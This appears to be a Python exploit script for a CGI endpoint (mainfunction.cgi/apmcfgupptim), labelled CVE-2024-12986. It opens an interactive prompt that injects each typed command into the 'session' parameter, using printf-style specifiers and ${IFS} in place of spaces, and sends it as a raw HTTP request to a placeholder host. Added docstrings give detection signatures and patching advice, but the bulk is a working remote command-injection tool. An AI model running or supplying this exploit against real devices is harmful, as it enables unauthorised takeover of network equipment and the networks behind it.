README.md not found for CVE-2024-12986. The file may not exist in the repository.
import socket
import socks
# Connection target. Both values are the author's placeholders as published,
# not a real address or port number.
HOST = "host"
PORT = "port"

# ANSI SGR escape codes, used only to colour the console output.
RESET = "\033[0m"
RED = "\033[91m"
GREEN = "\033[92m"
YELLOW = "\033[93m"
BLUE = "\033[94m"
CYAN = "\033[96m"
def send_http_request(host_ip, host_port, request):
    """Open one TCP connection, send the hex-decoded request, return the reply.

    Args:
        host_ip: Destination host handed to ``connect``.
        host_port: Destination port handed to ``connect``.
        request: ASCII hex digits as ``bytes``; converted to raw bytes before
            being sent.

    Returns:
        Everything read until the peer closes the connection, decoded as UTF-8
        with undecodable bytes replaced, or ``None`` if any step raised.
    """
    # Rebinds the process-wide socket class to the one from the `socks` module
    # on every call. No proxy settings are applied anywhere in this listing.
    socket.socket = socks.socksocket
    try:
        print(f"{CYAN}Connecting to {host_ip}:{host_port}...{RESET}")
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as conn:
            conn.settimeout(10)
            conn.connect((host_ip, host_port))
            # The caller passes hex text; this is the byte string that goes on
            # the wire (a bad hex string raises and is reported below).
            wire_bytes = bytes.fromhex(request.decode())
            print(f"{GREEN}Sending HTTP request...{RESET}")
            conn.sendall(wire_bytes)
            print(f"{GREEN}HTTP request sent successfully!{RESET}")
            # Read until EOF. A stall longer than the 10 s timeout raises, so
            # a partial reply is discarded and None is returned instead.
            chunks = []
            for chunk in iter(lambda: conn.recv(4096), b""):
                chunks.append(chunk)
            return b"".join(chunks).decode('utf-8', errors='replace')
    except Exception as e:
        # Catch-all: every failure (connect, hex decode, timeout) collapses to
        # one console line and a None return.
        print(f"{RED}An error occurred: {e}{RESET}")
        return None
def start_shell():
    """Prompt for lines on stdin and send one HTTP request per line.

    Each line is embedded in a fixed, hex-encoded request and passed to
    ``send_http_request`` with the module-level ``HOST`` and ``PORT``; the
    loop ends when the line is ``exit`` (case-insensitive).

    What the request looks like on the wire (decoded from the hex below):

    * Request line ``GET /cgi-bin/mainfunction.cgi/apmcfgupptim?session=...``
      followed by `` HTTP/1.0`` and an empty line. No ``Host`` or other
      headers are sent.
    * The ``session`` value is a run of ``x`` filler characters, ``0``, a raw
      ``0xb4`` byte and ``%52$c%52$c``, then the typed text with every space
      replaced by ``${IFS}``. Nothing is percent-encoded.

    Detection and mitigation notes for defenders:

    * Requests to that path whose ``session`` value contains non-ASCII bytes,
      printf-style ``%N$c`` specifiers or ``${IFS}`` are not produced by a
      normal browser session and are reasonable signatures for web/proxy
      logs or an IDS rule.
    * The page this listing comes from labels it CVE-2024-12986. How the
      device handles the ``session`` value is not visible here; presumably
      it reaches a shell. Confirm against the vendor advisory, apply the
      fixed firmware it names, and keep the management interface off
      untrusted networks.
    """
    rule = f"{BLUE}{'=' * 50}{RESET}"
    print(rule)
    print(f"{YELLOW}Interactive Shell Started{RESET}")
    print(f"{YELLOW}Type your commands below. Type 'exit' to quit.{RESET}")
    print(rule)

    # Fixed parts of the request, kept as hex text exactly as published.
    request_head = b'474554202f6367692d62696e2f6d61696e66756e6374696f6e2e6367692f61706d63666775707074696d3f73657373696f6e3d7878787878787878787878787878787878787878787878787878787878787878787878787878787878787878787878787878787830b425353224632535322463'
    request_tail = b'20485454502f312e300d0a0d0a'

    while True:
        typed = input(f"{CYAN}shell>{RESET} ")
        if typed.lower() == 'exit':
            print(f"{YELLOW}Exiting the shell. Goodbye!{RESET}")
            break

        # Spaces would split the HTTP request line, so the author swaps them
        # for the shell's ${IFS} variable; this token is a useful log indicator.
        spaced_out = typed.replace(" ", "${IFS}")
        typed_hex = spaced_out.encode().hex().encode()
        payload_binary = b''.join((request_head, typed_hex, request_tail))

        reply = send_http_request(HOST, PORT, payload_binary)

        # None (error) and an empty reply are both reported as "no response".
        if not reply:
            print(f"{RED}No response received. Please check the host, port, or payload.{RESET}")
            continue

        print(rule)
        print(f"{GREEN}HTTP response received:{RESET}")
        print(rule)
        print(reply)
        print(rule)
# Script entry point: run the prompt loop only when executed directly.
if __name__ == "__main__":
    try:
        start_shell()
    except KeyboardInterrupt:
        # Ctrl-C at the prompt ends the session with a message, not a traceback.
        print(f"\n{YELLOW}Shell interrupted. Goodbye!{RESET}")